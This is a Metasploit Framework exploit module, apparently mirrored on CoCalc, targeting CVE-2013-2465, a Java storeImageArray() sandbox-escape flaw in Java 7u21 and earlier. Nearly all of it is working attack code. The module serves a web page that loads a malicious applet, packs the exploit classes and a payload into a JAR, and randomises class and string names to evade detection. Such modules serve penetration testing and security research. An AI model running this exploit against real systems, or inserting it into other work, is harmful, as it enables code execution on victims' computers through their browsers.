CoCalc -- java_storeimagearray.rb

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_storeimagearray.rb
³¹²⁴⁰ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  # include Msf::Exploit::Remote::BrowserAutopwn
12
  # autopwn_info({ :javascript => false })
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Java storeImageArray() Invalid Array Indexing Vulnerability',
19
        'Description' => %q{
20
          This module abuses an Invalid Array Indexing Vulnerability on the
21
          static function storeImageArray() function in order to cause a
22
          memory corruption and escape the Java Sandbox. The vulnerability
23
          affects Java version 7u21 and earlier. The module, which doesn't bypass
24
          click2play, has been tested successfully on Java 7u21 on Windows and
25
          Linux systems.
26
        },
27
        'License' => MSF_LICENSE,
28
        'Author' => [
29
          'Unknown', # From PacketStorm
30
          'sinn3r', # Metasploit
31
          'juan vazquez' # Metasploit
32
        ],
33
        'References' => [
34
          [ 'CVE', '2013-2465' ],
35
          [ 'OSVDB', '96269' ],
36
          [ 'EDB', '27526' ],
37
          [ 'PACKETSTORM', '122777' ],
38
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ]
39
        ],
40
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
41
        'Targets' => [
42
          [
43
            'Generic (Java Payload)',
44
            {
45
              'Arch' => ARCH_JAVA,
46
              'Platform' => 'java'
47
            }
48
          ],
49
          [
50
            'Windows Universal',
51
            {
52
              'Arch' => ARCH_X86,
53
              'Platform' => 'win'
54
            }
55
          ],
56
          [
57
            'Linux x86',
58
            {
59
              'Arch' => ARCH_X86,
60
              'Platform' => 'linux'
61
            }
62
          ]
63
        ],
64
        'DefaultTarget' => 0,
65
        'DisclosureDate' => '2013-08-12',
66
        'Notes' => {
67
          'Reliability' => UNKNOWN_RELIABILITY,
68
          'Stability' => UNKNOWN_STABILITY,
69
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
70
        }
71
      )
72
    )
73
  end
74

75
  def setup
76
    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2013-2465', 'Exploit.class')
77
    @exploit_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }
78
    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2013-2465', 'Exploit$MyColorModel.class')
79
    @color_model_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }
80
    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2013-2465', 'Exploit$MyColorSpace.class')
81
    @color_space_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }
82

83
    @exploit_class_name = rand_text_alpha('Exploit'.length)
84
    @color_model_class_name = rand_text_alpha('MyColorModel'.length)
85
    @color_space_class_name = rand_text_alpha('MyColorSpace'.length)
86

87
    @exploit_class.gsub!('Exploit', @exploit_class_name)
88
    @exploit_class.gsub!('MyColorModel', @color_model_class_name)
89
    @exploit_class.gsub!('MyColorSpace', @color_space_class_name)
90

91
    @color_model_class.gsub!('Exploit', @exploit_class_name)
92
    @color_model_class.gsub!('MyColorModel', @color_model_class_name)
93
    @color_model_class.gsub!('MyColorSpace', @color_space_class_name)
94

95
    @color_space_class.gsub!('Exploit', @exploit_class_name)
96
    @color_space_class.gsub!('MyColorModel', @color_model_class_name)
97
    @color_space_class.gsub!('MyColorSpace', @color_space_class_name)
98

99
    super
100
  end
101

102
  def on_request_uri(cli, request)
103
    vprint_status("Requesting: #{request.uri}")
104
    if request.uri !~ /\.jar$/i
105
      if !(request.uri =~ %r{/$})
106
        vprint_status('Sending redirect...')
107
        send_redirect(cli, "#{get_resource}/", '')
108
        return
109
      end
110

111
      print_status('Sending HTML...')
112
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
113
      return
114
    end
115

116
    print_status('Sending .jar file...')
117
    send_response(cli, generate_jar(cli), { 'Content-Type' => 'application/java-archive' })
118

119
    handler(cli)
120
  end
121

122
  def generate_html
123
    jar_name = rand_text_alpha(rand(5..7))
124
    html = %(<html>
125
    <head>
126
    </head>
127
    <body>
128
    <applet archive="#{jar_name}.jar" code="#{@exploit_class_name}" width="1000" height="1000">
129
    </applet>
130
    </body>
131
    </html>
132
    )
133
    html = html.gsub(/^ {4}/, '')
134
    return html
135
  end
136

137
  def generate_jar(cli)
138
    p = regenerate_payload(cli)
139
    jar = p.encoded_jar
140

141
    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
142
    jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class)
143
    jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class)
144
    metasploit_str = rand_text_alpha('metasploit'.length)
145
    payload_str = rand_text_alpha('payload'.length)
146
    jar.entries.each do |entry|
147
      entry.name.gsub!('metasploit', metasploit_str)
148
      entry.name.gsub!('Payload', payload_str)
149
      entry.data = entry.data.gsub('metasploit', metasploit_str)
150
      entry.data = entry.data.gsub('Payload', payload_str)
151
    end
152
    jar.build_manifest
153

154
    return jar.pack
155
  end
156
end
157

158
Product

Resources

Company
